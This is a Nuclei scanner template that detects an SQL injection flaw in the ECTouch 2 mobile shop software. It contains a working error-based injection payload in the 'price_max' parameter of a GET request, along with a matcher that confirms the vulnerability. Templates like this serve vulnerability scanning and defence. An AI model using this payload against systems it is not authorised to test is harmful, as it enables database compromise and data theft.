id: etouch-v2-sqli

info:
  name: ECTouch 2 - SQL Injection
  author: princechaddha
  severity: critical
  description: ECTouch 2 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/mstxq17/CodeCheck/
    - https://www.anquanke.com/post/id/168991
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: etouch,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

# digest: 4a0a0047304502206cc0a7b12ced842aafe5776e06f95725650679bbaa52aec306b5682005a54cbd022100c81285b70a70d5a964352060c5ca6b886dd55ea67fb63004a927e026c4a5f7be:922c64590222798bb761d5b6d8e72950
